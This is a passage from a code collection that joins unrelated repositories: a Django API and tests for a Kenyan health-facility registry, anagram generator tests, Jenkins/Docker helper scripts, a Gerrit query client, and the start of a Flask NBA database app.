Q(is_approved=False, is_rejected=False) |
Q(has_edits=True)).distinct().filter(
facility__in=self.get_queryset()).count()
def get_rejected_chus(self):
"""
Get the number of CHUs that have been rejected
"""
return CommunityHealthUnit.objects.filter(is_rejected=True).count()
def get_rejected_facilities_count(self):
return self.get_queryset().filter(rejected=True).count()
def get_closed_facilities_count(self):
return self.get_queryset().filter(closed=True).count()
def get(self, *args, **kwargs):
user = self.request.user
data = {
"total_facilities": self.get_queryset().count(),
"county_summary": self.get_facility_county_summary()
if user.is_national else [],
"constituencies_summary": self.get_facility_constituency_summary()
if user.county else [],
"wards_summary": self.get_facility_ward_summary()
if user.constituency else [],
"owners_summary": self.get_facility_owner_summary(),
"types_summary": self.get_facility_type_summary(),
"status_summary": self.get_facility_status_summary(),
"owner_types": self.get_facility_owner_types_summary(),
"recently_created": self.get_recently_created_facilities(),
"recently_created_chus": self.get_recently_created_chus(),
"pending_updates": self.facilities_pending_approval_count(),
"rejected_facilities_count": self.get_rejected_facilities_count(),
"closed_facilities_count": self.get_closed_facilities_count(),
"rejected_chus": self.get_rejected_chus(),
"chus_pending_approval": self.get_chus_pending_approval(),
"total_chus": CommunityHealthUnit.objects.filter(
facility__in=self.get_queryset()).count()
}
fields = self.request.query_params.get("fields", None)
if fields:
required = fields.split(",")
required_data = {
i: data[i] for i in data if i in required
}
return Response(required_data)
return Response(data)
```
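The `get` method above supports a `fields` query parameter to trim the payload and period flags such as `last_week`. A client-side sketch follows; the base URL and token are placeholders, and only the query parameter names come from the view above.
```python
# Hypothetical client call against the dashboard endpoint; the URL path and
# auth token are placeholders, the query parameters come from the view above.
import requests

resp = requests.get(
    "https://mfl.example.org/api/facilities/dashboard/",
    params={
        "fields": "total_facilities,owners_summary,recently_created",
        "last_week": "true",
    },
    headers={"Authorization": "Bearer <access-token>"},
)
print(resp.json())
```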
#### File: management/commands/load_kenyan_administrative_boundaries.py
```python
from django.core.management import BaseCommand
from mfl_gis.models import CountyBoundary, ConstituencyBoundary, WardBoundary
from common.models import County, Constituency, Ward
from .shared import _load_boundaries
class Command(BaseCommand):
"""Load the boundaries of counties, constituencies and wards"""
def handle(self, *args, **options):
_load_boundaries(
feature_type='counties',
boundary_cls=CountyBoundary,
admin_area_cls=County,
name_field='COUNTY_NAM',
code_field='COUNTY_COD'
)
_load_boundaries(
feature_type='constituencies',
boundary_cls=ConstituencyBoundary,
admin_area_cls=Constituency,
name_field='CONSTITUEN',
code_field='CONST_CODE'
)
_load_boundaries(
feature_type='wards',
boundary_cls=WardBoundary,
admin_area_cls=Ward,
name_field='COUNTY_A_1',
code_field='COUNTY_ASS'
)
```
#### File: mfl_api/mfl_gis/pagination.py
```python
from rest_framework.pagination import PageNumberPagination
class GISPageNumberPagination(PageNumberPagination):
def get_page_size(self, request):
"""Impractically high limit; ensures we always return all boundaries"""
return 1500000
```
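A sketch of how a GIS list view might opt into this pagination class; this is standard DRF wiring, and the view name plus the commented-out queryset/serializer are placeholders.
```python
# Hypothetical list view using the pagination class above.
from rest_framework import generics

from mfl_gis.pagination import GISPageNumberPagination


class BoundaryListView(generics.ListAPIView):
    # effectively disables paging so map clients get every boundary at once
    pagination_class = GISPageNumberPagination
    # queryset = WardBoundary.objects.all()        # placeholder
    # serializer_class = WardBoundarySerializer    # placeholder
```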
#### File: mfl_gis/tests/test_views.py
```python
from rest_framework.test import APITestCase
from common.tests.test_views import LoginMixin
from common.models import Ward, County, Constituency
from django.core.urlresolvers import reverse
from model_mommy import mommy
from facilities.models import FacilityUpdates, Facility
from ..models import (
WorldBorder,
CountyBoundary,
ConstituencyBoundary,
WardBoundary,
FacilityCoordinates,
GeoCodeMethod,
GeoCodeSource
)
from ..serializers import WorldBorderDetailSerializer
class TestCountryBoundariesView(LoginMixin, APITestCase):
def test_retrieve_single_country_boundary(self):
country = mommy.make(WorldBorder)
url = reverse(
'api:mfl_gis:world_border_detail', kwargs={'pk': country.pk})
response = self.client.get(url)
expected_data = WorldBorderDetailSerializer(
country,
context={
'request': response.request
}
).data
# Silly issues with floats being rounded to different precisions
# between the serializer and the "round trip through the view" version
self.assertEqual(
expected_data['properties']['code'],
response.data['properties']['code']
)
class TestCountyBoundaryViews(LoginMixin, APITestCase):
def setUp(self):
super(TestCountyBoundaryViews, self).setUp()
self.list_url = reverse('api:mfl_gis:county_boundaries_list')
def test_listing(self):
mommy.make(CountyBoundary)
mommy.make(CountyBoundary)
boundary_list_response = self.client.get(self.list_url)
self.assertEqual(200, boundary_list_response.status_code)
self.assertEqual(2, len(boundary_list_response.data['results']))
class TestConstituencyBoundaryViews(LoginMixin, APITestCase):
def setUp(self):
super(TestConstituencyBoundaryViews, self).setUp()
self.list_url = reverse('api:mfl_gis:constituency_boundaries_list')
def test_listing(self):
mommy.make(ConstituencyBoundary)
mommy.make(ConstituencyBoundary)
boundary_list_response = self.client.get(self.list_url)
self.assertEqual(200, boundary_list_response.status_code)
self.assertEqual(2, len(boundary_list_response.data['results']))
class TestWardBoundaryViews(LoginMixin, APITestCase):
def setUp(self):
super(TestWardBoundaryViews, self).setUp()
self.list_url = reverse('api:mfl_gis:ward_boundaries_list')
def test_listing(self):
mommy.make(WardBoundary)
mommy.make(WardBoundary)
boundary_list_response = self.client.get(self.list_url)
self.assertEqual(200, boundary_list_response.status_code)
self.assertEqual(2, len(boundary_list_response.data['results']))
def test_get_single(self):
boundary = mommy.make(WardBoundary)
url = self.list_url + "{}/".format(boundary.id)
response = self.client.get(url)
self.assertEqual(200, response.status_code)
assert not response.data.get('properties').get('facility_ids')
class TestFacilityCoordinatesListing(LoginMixin, APITestCase):
def test_list_facility_coordinates(self):
url = reverse("api:mfl_gis:facility_coordinates_list")
ward = mommy.make(Ward)
const = mommy.make(Constituency)
county = mommy.make(County)
response = self.client.get(url)
self.assertIsInstance(response.data, list)
response = self.client.get(url)
self.assertIsInstance(response.data, list)
self.assertEquals(0, len(response.data))
# test ward filter
ward_url = url + "?ward={}".format(ward.id)
response = self.client.get(ward_url)
self.assertIsInstance(response.data, list)
self.assertEquals(0, len(response.data))
# test county
county_url = url + "?county={}".format(county.id)
response = self.client.get(county_url)
self.assertIsInstance(response.data, list)
self.assertEquals(0, len(response.data))
# test constituency
const_url = url + "?constituency={}".format(const.id)
response = self.client.get(const_url)
self.assertIsInstance(response.data, list)
self.assertEquals(0, len(response.data))
class TestPostingFacilityCoordinates(LoginMixin, APITestCase):
def setUp(self):
self.url = reverse("api:mfl_gis:facility_coordinates_simple_list")
super(TestPostingFacilityCoordinates, self).setUp()
def test_get(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
response = self.client.get(self.url)
self.assertEquals(200, response.status_code)
def test_retrieve(self):
facility_gps = mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
url = self.url + "{}/".format(str(facility_gps.id))
response = self.client.get(url)
self.assertEquals(200, response.status_code)
def test_create_facility_coordinates_success(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
facilities = Facility.objects.all()
ward = facilities[0].ward
facility = mommy.make(Facility, ward=ward)
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
facility_coords = FacilityCoordinates.objects.all()
data = {
"facility": str(facility.id),
"method": str(method.id),
"source": str(source.id),
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[0],
facility_coords[0].coordinates[1]
]
}
}
url = self.url
response = self.client.post(url, data)
self.assertEquals(201, response.status_code)
self.assertEquals(2, FacilityCoordinates.objects.count())
def test_create_facility_coordinates_success_facility_approved(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
facilities = Facility.objects.all()
ward = facilities[0].ward
facility = mommy.make(Facility, ward=ward)
facility.approved = True
facility.save(allow_save=True)
facility_refetched = Facility.objects.get(id=facility.id)
self.assertTrue(facility_refetched.approved)
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
facility_coords = FacilityCoordinates.objects.all()
data = {
"facility": facility.id,
"method": method.id,
"source": source.id,
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[0],
facility_coords[0].coordinates[1]
]
}
}
url = self.url
response = self.client.post(url, data)
self.assertEquals(201, response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
self.assertEquals(1, FacilityUpdates.objects.count())
update = FacilityUpdates.objects.all()[0]
approval_url = reverse(
"api:facilities:facility_updates_detail",
kwargs={'pk': str(update.id)})
approval_payload = {
"approved": True
}
approval_response = self.client.patch(approval_url, approval_payload)
self.assertEquals(200, approval_response.status_code)
self.assertEquals(2, FacilityCoordinates.objects.count())
def test_create_facility_coordinates_error(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
facilities = Facility.objects.all()
ward = facilities[0].ward
facility = mommy.make(Facility, ward=ward)
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
facility_coords = FacilityCoordinates.objects.all()
data = {
"facility": str(facility.id),
"method": str(method.id),
"source": str(source.id),
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[1],
facility_coords[0].coordinates[0]
]
}
}
response = self.client.post(self.url, data)
self.assertEquals(400, response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
def test_update_facility_coordinates(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
data = {
"method": str(method.id),
"source": str(source.id),
"coordinates": {
"type": "POINT",
"coordinates": [13525, 23525]
}
}
facility_coords = FacilityCoordinates.objects.all()
url = self.url + str(facility_coords[0].id) + "/"
response = self.client.patch(url, data)
self.assertEquals(400, response.status_code)
self.assertEquals(0, FacilityUpdates.objects.count())
def test_update_facility_coordinates_success(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
facility_coords = FacilityCoordinates.objects.all()
facility = facility_coords[0].facility
facility.approved = True
facility.save(allow_save=True)
data = {
"facility": str(facility.id),
"method": str(method.id),
"source": str(source.id),
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[0],
facility_coords[0].coordinates[1]
]
}
}
url = self.url + str(facility_coords[0].id) + "/"
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
self.assertEquals(1, FacilityUpdates.objects.count())
# approve the facility updates
update = FacilityUpdates.objects.all()[0]
approval_url = reverse(
"api:facilities:facility_updates_detail",
kwargs={'pk': str(update.id)})
approval_payload = {
"approved": True
}
approval_response = self.client.patch(approval_url, approval_payload)
self.assertEquals(200, approval_response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
def test_update_facility_coordinates_success_facility_not_approved(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
facility_coords = FacilityCoordinates.objects.all()
facility = facility_coords[0].facility
data = {
"facility": str(facility.id),
"method": str(method.id),
"source": str(source.id),
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[0],
facility_coords[0].coordinates[1]
]
}
}
url = self.url + str(facility_coords[0].id) + "/"
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
self.assertEquals(0, FacilityUpdates.objects.count())
self.assertEquals(1, FacilityCoordinates.objects.count())
def test_update_coordinates_only(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
facility_coords = FacilityCoordinates.objects.all()
facility = facility_coords[0].facility
facility.approved = True
facility.save(allow_save=True)
data = {
"facility": str(facility.id),
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[0],
facility_coords[0].coordinates[1]
]
}
}
url = self.url + str(facility_coords[0].id) + "/"
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
self.assertEquals(1, FacilityUpdates.objects.count())
update = FacilityUpdates.objects.all()[0]
approval_url = reverse(
"api:facilities:facility_updates_detail",
kwargs={'pk': str(update.id)})
approval_payload = {
"approved": True
}
approval_response = self.client.patch(approval_url, approval_payload)
self.assertEquals(200, approval_response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
class TestBoundaryBoundsView(LoginMixin, APITestCase):
def test_get_county_boundary(self):
boundary = mommy.make(CountyBoundary)
url = reverse(
"api:mfl_gis:county_bound",
kwargs={'pk': str(boundary.id)})
response = self.client.get(url)
self.assertEquals(200, response.status_code)
def test_get_constituency_boundary(self):
boundary = mommy.make(ConstituencyBoundary)
url = reverse(
"api:mfl_gis:constituency_bound",
kwargs={'pk': str(boundary.id)})
response = self.client.get(url)
self.assertEquals(200, response.status_code)
class TestIkoWapi(LoginMixin, APITestCase):
def setUp(self):
super(TestIkoWapi, self).setUp()
self.url = reverse("api:mfl_gis:ikowapi")
def test_invalid_lat_long(self):
resp = self.client.post(self.url, {
"longitude": "1.234",
"latitude": "32.234"
})
self.assertEqual(resp.status_code, 400)
self.assertIn("longitude", resp.data)
self.assertIn("latitude", resp.data, )
def test_invalid_lat(self):
resp = self.client.post(self.url, {
"longitude": 1.234,
"latitude": "32.234"
})
self.assertEqual(resp.status_code, 400)
self.assertNotIn("longitude", resp.data)
self.assertIn("latitude", resp.data)
def test_invalid_long(self):
resp = self.client.post(self.url, {
"longitude": "1.234",
"latitude": 32.234
})
self.assertEqual(resp.status_code, 400)
self.assertIn("longitude", resp.data)
self.assertNotIn("latitude", resp.data)
def test_find_ward_found(self):
mommy.make_recipe("mfl_gis.tests.ward_boundary_recipe")
resp = self.client.post(self.url, {
"longitude": 36.78378206656476,
"latitude": -1.2840274151085824
})
self.assertEqual(resp.status_code, 200)
for i in ['ward', 'constituency', 'county']:
self.assertIn(i, resp.data)
def test_find_ward_not_found(self):
mommy.make_recipe("mfl_gis.tests.ward_boundary_recipe")
resp = self.client.post(self.url, {
"longitude": 3.780612,
"latitude": -1.275611
})
self.assertEqual(resp.status_code, 400)
class TestDrillDownFacility(LoginMixin, APITestCase):
def setUp(self):
super(TestDrillDownFacility, self).setUp()
self.url = reverse("api:mfl_gis:drilldown_facility")
def test_listing(self):
mommy.make_recipe('mfl_gis.tests.facility_coordinates_recipe')
resp = self.client.get(self.url)
self.assertEqual(resp.status_code, 200)
class TestDrillDownCountry(LoginMixin, APITestCase):
def setUp(self):
super(TestDrillDownCountry, self).setUp()
self.url = reverse("api:mfl_gis:drilldown_country")
def test_get_listing(self):
mommy.make_recipe('mfl_gis.tests.county_boundary_recipe')
resp = self.client.get(self.url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data['meta']['name'], 'KENYA')
self.assertIsInstance(resp.data['geojson'], dict)
class TestDrillDownCounty(LoginMixin, APITestCase):
def setUp(self):
super(TestDrillDownCounty, self).setUp()
self.url = "api:mfl_gis:drilldown_county"
def test_get_listing(self):
cb = mommy.make_recipe('mfl_gis.tests.county_boundary_recipe')
mommy.make_recipe("mfl_gis.tests.constituency_boundary_recipe")
resp = self.client.get(
reverse(self.url, kwargs={"code": cb.area.code})
)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data['meta']['name'], cb.area.name)
self.assertIsInstance(resp.data['geojson'], dict)
class TestDrillDownConstituency(LoginMixin, APITestCase):
def setUp(self):
super(TestDrillDownConstituency, self).setUp()
self.url = "api:mfl_gis:drilldown_constituency"
def test_get_listing(self):
mommy.make_recipe('mfl_gis.tests.county_boundary_recipe')
cb2 = mommy.make_recipe("mfl_gis.tests.constituency_boundary_recipe")
mommy.make_recipe("mfl_gis.tests.ward_boundary_recipe")
resp = self.client.get(
reverse(self.url, kwargs={"code": cb2.area.code})
)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data['meta']['name'], cb2.area.name)
self.assertEqual(
resp.data['meta']['county_code'], cb2.area.county.code
)
self.assertIsInstance(resp.data['geojson'], dict)
class TestDrillDownWard(LoginMixin, APITestCase):
def setUp(self):
super(TestDrillDownWard, self).setUp()
self.url = "api:mfl_gis:drilldown_ward"
def test_get_listing(self):
wb = mommy.make_recipe("mfl_gis.tests.ward_boundary_recipe")
resp = self.client.get(
reverse(self.url, kwargs={"code": wb.area.code})
)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data['properties']['name'], wb.area.name)
self.assertEqual(
resp.data['properties']['county_code'],
wb.area.constituency.county.code
)
self.assertEqual(
resp.data['properties']['constituency_code'],
wb.area.constituency.code
)
self.assertEqual(
resp.data['id'], wb.area.code
)
self.assertIsInstance(resp.data['geometry'], dict)
```
#### File: management/commands/resend_user_emails.py
```python
from django.core.management import BaseCommand
from ...tasks import resend_user_signup_emails
class Command(BaseCommand):
def handle(self, *args, **kwargs):
resend_user_signup_emails()
```
#### File: users/tests/test_model_repr.py
```python
from django.test import TestCase
from common.tests import ModelReprMixin
from users import models
class TestModelRepr(ModelReprMixin, TestCase):
def test_user(self):
self.check_repr(
models.MflUser(first_name="fname", last_name="lname"),
"fname lname"
)
def test_oauth_app(self):
self.check_repr(
models.MFLOAuthApplication(name="app"),
"app"
)
self.check_repr(
models.MFLOAuthApplication(client_id="client id"),
"client id"
)
def test_custom_group(self):
g = models.Group.objects.create(name="ha")
self.check_repr(models.CustomGroup(group=g), "ha")
def test_proxy_group(self):
self.check_repr(models.ProxyGroup(name="ha"), "ha")
```
|
{
"source": "jenky64/anagram",
"score": 2
}
|
#### File: jenky64/anagram/noxfile.py
```python
import nox
@nox.session(python=["3.8"],venv_backend="conda")
def tests(session):
session.conda_install('--file','package-list.txt')
session.run('conda',
'develop',
'.',
'--prefix',
session.virtualenv.location)
session.run('pytest')
@nox.session(python=["3.8"],venv_backend="conda")
def lint(session):
session.conda_install('flake8')
session.run('flake8', 'anagram/')
```
#### File: anagram/tests/test_generator.py
```python
from anagram.generator import Generator
from pathlib import Path
import pytest
generator = Generator()
@pytest.mark.order(1)
def test_initialize_db():
db_name = '/'.join((str(Path(__file__).resolve().parent),'collins.db'))
generator.initialize_db(db_name=db_name)
table = generator.database.get_tables()[0]
assert table == 'words'
@pytest.mark.order(2)
def test_get_stats():
generator.get_stats()
assert generator.max_word_length == 15
assert generator.word_count == 279496
@pytest.mark.order(3)
def test_set_word_set_size_one():
generator.set_word(word='python')
assert generator.word == ['h', 'n', 'o', 'p', 't', 'y']
assert generator.min_size == 2
assert generator.max_size == 7
assert generator.size is None
@pytest.mark.order(4)
def test_set_word_set_size_two():
generator.set_word(word='numbers', min_size=3, max_size=4)
assert generator.word == ['b', 'e', 'm', 'n', 'r', 's', 'u']
assert generator.min_size == 3
assert generator.max_size == 5
assert generator.size is None
@pytest.mark.order(5)
def test_set_word_set_size_three():
generator.set_word(word='regis', size=4)
assert generator.word == ['e', 'g', 'i', 'r', 's']
assert generator.min_size == 4
assert generator.max_size == 5
assert generator.size is None
@pytest.mark.order(6)
def test_generate_anagrams_one():
generator.set_word('stop')
generator.generate_anagrams()
expected = {2: ['op', 'os', 'po', 'so', 'st', 'to'],
3: ['ops', 'opt', 'pos', 'pot', 'pst', 'sop', 'sot', 'top'],
4: ['opts', 'post', 'pots', 'spot', 'stop', 'tops']}
assert generator.anagrams == expected
@pytest.mark.order(7)
def test_generate_anagrams_two():
generator.set_word('python', min_size=3, max_size=4)
generator.generate_anagrams()
expected = {3: ['hon', 'hop', 'hot', 'hoy', 'hyp', 'noh', 'not', 'noy', 'nth', 'ony', 'opt',
'pho', 'pht', 'poh', 'pot', 'tho', 'thy', 'ton', 'top', 'toy', 'yon'],
4: ['hypo', 'phon', 'phot', 'pont', 'pony', 'pyot', 'thon', 'tony',
'toph', 'typo', 'yont']}
assert generator.anagrams == expected
@pytest.mark.order(8)
def test_generate_anagrams_three():
generator.set_word('development', size=7)
generator.generate_anagrams()
expected = {7: ['demeton', 'deplete', 'develop', 'devotee', 'dolente', 'dovelet',
'element', 'enmoved', 'envelop', 'evented', 'lemoned', 'leptome',
'pentode', 'teendom', 'telemen', 'templed', 'venomed']}
assert generator.anagrams == expected
```
|
{
"source": "jenky64/msds692",
"score": 2
}
|
#### File: scripts/docker/build.py
```python
import argparse
import docker
import sys
import shutil
from filecmp import cmp
from pathlib import Path, PurePath
docker_check_files = [('dockerfile.prev','dockerfile'),
('testing-modules-list.prev','testing-modules-list.txt')]
def setup():
"""
create and return docker client
:return: docker client
"""
return docker.from_env()
def build_image(client, wkspc_dir: str, tag: str) -> bool:
"""
    rebuild the docker image if required
    :param client: docker client
    :param wkspc_dir: jenkins workspace name
:param tag: docker image tag
:return: T/F
"""
    # compute the build directory under /volumes for this workspace
build_dir: str = '/'.join(['/volumes', PurePath(wkspc_dir).name])
# attempt to build the image
# if it is successful return True
# if it fails return False
try:
client.images.build(path=build_dir,
tag=tag,
forcerm=True)
except (docker.errors.BuildError, docker.errors.APIError):
return False
return True
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dir')
parser.add_argument('-t','--tag')
args = parser.parse_args()
client = setup()
if args.dir and args.tag:
wkspc_dir = args.dir
tag = args.tag
ret = build_image(client=client,
wkspc_dir=wkspc_dir,
tag=tag)
if ret:
sys.exit(0)
else:
sys.exit(1)
else:
pass
```
#### File: scripts/docker/run.py
```python
import argparse
import logging
import docker
import sys
import shutil
from filecmp import cmp
from pathlib import Path, PurePath
docker_check_files = [('dockerfile.prev','dockerfile'),
('testing-modules-list.prev','testing-modules-list.txt')]
def setup():
"""
setup and return the docker client
:return: docker client
"""
return docker.from_env()
def run_image(client, image: str, wkspc_dir: str) -> bool:
"""
run the docker image
:param client: docker client
:param image: docker image name
:param wkspc_dir: jenkins workspace directory name
:return: T/F
"""
ret = True
# verify the volume branch /volumes directory exists
vol_dir = '/'.join(['/volumes', PurePath(wkspc_dir).name])
if not Path(vol_dir).exists():
return False
# these are the filesystems that the image is
# going to mount as volumes
# wkspc_dir is the jenkins workspace directory
# vol_dir is the branch directory under /volumes
volumes = { wkspc_dir: {'bind': '/app', 'mode': 'rw'},
vol_dir: {'bind': '/backup', 'mode': 'rw'}
}
# create unique name for the docker container
# this will prevent name conflicts for branches
# in different repositories that have the same name
container_name = PurePath(wkspc_dir).name
command='/app/runtests.py'
try:
client.containers.run(image=image,
command=command,
name=container_name,
volumes=volumes,
remove=True,
detach=False)
except docker.errors.APIError:
ret = False
finally:
pass
return ret
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dir')
parser.add_argument('-i','--image')
args = parser.parse_args()
client = setup()
if args.dir and args.image:
wkspc_dir = args.dir
image = args.image
ret = run_image(client, image=image, wkspc_dir=wkspc_dir)
if ret:
sys.exit(0)
else:
sys.exit(1)
else:
sys.exit(1)
```
#### File: scripts/docker/validate.py
```python
import argparse
import sys
from filecmp import cmp
from pathlib import Path, PurePath
# files that need to exist for the image to be validated
docker_check_files = [('dockerfile.prev', 'dockerfile'),
('testing-modules-list.prev', 'testing-modules-list.txt')]
def validate_docker_image(wkspc_dir: str) -> bool:
"""
:param wkspc_dir: jenkins workspace directory name
:return: T/F
"""
# get the branch directory name under /volumes
vol_dir = '/'.join(['/volumes', PurePath(wkspc_dir).name])
# iterate over files and compare the copy in
# the workspace directory to the backup copy
# in the branch volumes directory
for file_names in docker_check_files:
src_file = '/'.join([wkspc_dir, file_names[1]])
chk_file = '/'.join([vol_dir, file_names[0]])
        # if a file does not exist, treat it as not validating
try:
val = cmp(src_file, chk_file)
except OSError as e:
val = False
        # cmp() returns True if the files match, False otherwise
        # if even one file does not validate
        # we stop checking
if not val:
break
if val:
return True
else:
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dir')
args = parser.parse_args()
if args.dir:
wkspc_dir = args.dir
ret = validate_docker_image(wkspc_dir=wkspc_dir)
if ret:
sys.exit(0)
else:
sys.exit(1)
else:
sys.exit(1)
```
#### File: scripts/git/delete_commit.py
```python
import argparse
import logging
import sys
import shutil
from pathlib import Path, PurePath
def delete_commit(wkspc_dir) -> bool:
    """
    the commit tag of the most recent commit
    whose tests passed is saved in a file.
    this function deletes that file
    :param wkspc_dir: jenkins workspace directory
    :return: True on success, False otherwise
    """
vol_dir = '/'.join(['/volumes', PurePath(wkspc_dir).name])
if not Path(vol_dir).exists():
return False
commit_path = Path('/'.join([vol_dir, 'commit.txt']))
try:
commit_path.unlink()
except Exception:
return False
return True
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dir')
args = parser.parse_args()
if args.dir:
wkspc_dir = args.dir
ret = delete_commit(wkspc_dir=wkspc_dir)
if ret:
sys.exit(0)
else:
sys.exit(1)
else:
sys.exit(1)
```
#### File: scripts/git/read_commit.py
```python
import argparse
import logging
import sys
import shutil
from pathlib import Path, PurePath
def read_commit(wkspc_dir) -> str:
"""
read and return the value
in the commit file
    :param wkspc_dir: jenkins workspace directory
:return: commit tag value
"""
commit = 'false'
# confirm branch directory exists
vol_dir = '/'.join(['/volumes', PurePath(wkspc_dir).name])
if not Path(vol_dir).exists():
return commit
commit_path = Path('/'.join([vol_dir, 'commit.txt']))
# read commit value and return it.
# or return 'false'
try:
commit = commit_path.read_text()
except Exception:
pass
return commit
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dir')
args = parser.parse_args()
if args.dir:
wkspc_dir = args.dir
commit = read_commit(wkspc_dir=wkspc_dir)
print(f'{commit}')
else:
print(f'false')
```
|
{
"source": "JenMeyer/CodeCollabCrawler",
"score": 3
}
|
#### File: JenMeyer/CodeCollabCrawler/GerritQueryHandler.py
```python
import requests
import ast
import re
import pprint
from typing import List, Union, Dict, Optional, Tuple
class GerritQueryHandler:
"""
Handles the execution of the requests and the formatting of the responses.
"""
def __init__(self, url: str, beforeDate: str = None, afterDate: str = None) -> None:
"""
Initializes the Query Handler with url and optional time parameters.
:param url: The url of the request, should be one the endpoints of the REST API.
:type url: str
:param beforeDate: Optional. A possible date for a 'before' parameter in your query. It has to be in the format
of yyyy-mm-dd.
:type beforeDate: str
:param afterDate: Optional. A possible date for a 'after' parameter in your query. It has to be in the format
of yyyy-mm-dd.
:type afterDate: str
"""
self.session = requests.session()
self.url = url
#optional request parameters
self.before = beforeDate
self.after = afterDate
def buildURL(self, user: str, startpoint: int) -> str:
"""
        Builds the request url out of the given parameters.
:param user: The respective user of the request
:type user: str
:param startpoint: The startpoint of the query. Necessary as the response amount is restricted and the request
needs to be executed multiple times with different startpoints.
:type startpoint: int
:return: The final request url
:rtype: str
"""
url = self.url
if self.url[-1] != '/':
url += '/'
#enters user into request url
url += '?q=owner:' + user
#adds optional time params
if self.before:
url += '+before:' + self.before
if self.after:
url +='+after:' + self.after
#adds the startpoint
url += '&S=' + str(startpoint)
#print(url)
return url
#makes request for commits and returns it as formatted list
def getCommits(self, user: str, startpoint: int) -> Tuple[List[Dict], bool, bool]:
"""
Executes the request and gets all commits fitting the parameters belonging to the user.
:param user: The respective user of the request
:type user: str
:param startpoint: The startpoint of the query. Necessary as the response amount is restricted and the request
needs to be executed multiple times with different startpoints.
:type startpoint: int
        :return: Returns the commitList which contains the commits as dictionaries; if there are no commits it will
            be an empty list. Also returns whether the request is finished and whether the user is active.
:rtype: Tuple[List[Dict], bool, bool]
"""
active = True
url = self.buildURL(user, startpoint)
#actual request
userCommitsTime = self.session.get(url)
#for control
#print(userCommitsTime.text)
#handles inactive accounts
if "following exact account" in userCommitsTime.text:
print("inactive!")
active = False
#extracts userID for inactive account
ID_candidate = re.findall(r'(\d+):', userCommitsTime.text)
if ID_candidate:
url = self.buildURL(ID_candidate[0], startpoint)
userCommitsTime = self.session.get(url)
else:
print("Error: no ID_candidate" + user)
print(userCommitsTime.text)
commitsList, notDone = self.formatStringToList(userCommitsTime)
return commitsList, notDone, active
    def formatStringToList(self, string: requests.Response) -> Tuple[List[Dict], bool]:
        """
        Formats the text of the response into a list of dictionaries.
        :param string: The HTTP response whose text is to be formatted.
        :type string: requests.Response
        :return: Returns the formatted list and whether the request is finished
:rtype: Tuple[List[Dict], bool]
"""
#cuts first line
commitsString = string.text.split("\n", 1)[1]
if commitsString == '':
return [], False
#checks for more changes, sets notDone accordingly
if '"_more_changes": true' in commitsString:
commitsString = commitsString.replace('"_more_changes": true\n', '')
notDone = True
else:
notDone = False
commitsString = commitsString.replace('true', 'True').replace('false', 'False')
# print(user)
# print(commitsString)
#converts string to a list
commitsList = ast.literal_eval(commitsString)
return commitsList, notDone
```
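A driver sketch for the handler above: it pages through one user's commits using the returned `notDone` flag. The Gerrit endpoint, dates, and username are placeholders, and the import assumes the file name shown in the header.
```python
# Hypothetical paging loop over a user's Gerrit changes.
from GerritQueryHandler import GerritQueryHandler

handler = GerritQueryHandler(
    "https://gerrit.example.org/changes/",
    beforeDate="2020-01-01",
    afterDate="2019-01-01",
)

start = 0
all_commits = []
while True:
    commits, not_done, active = handler.getCommits("jdoe", start)
    all_commits.extend(commits)
    if not not_done:
        break
    start += len(commits)  # continue from where the previous page ended

print(len(all_commits), "commits found; account active:", active)
```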
|
{
"source": "jenminni/misy350-s18-finalapp",
"score": 3
}
|
#### File: jenminni/misy350-s18-finalapp/nba.py
```python
import os
from flask import Flask, render_template, request, redirect, url_for, jsonify
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# setting up SQLAlchemy
basedir = os.path.abspath(os.path.dirname(__file__))
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')
db = SQLAlchemy(app)
# defining database tables
class Team(db.Model):
__tablename__ = 'teams'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
location = db.Column(db.Text)
team_colors = db.Column(db.Text)
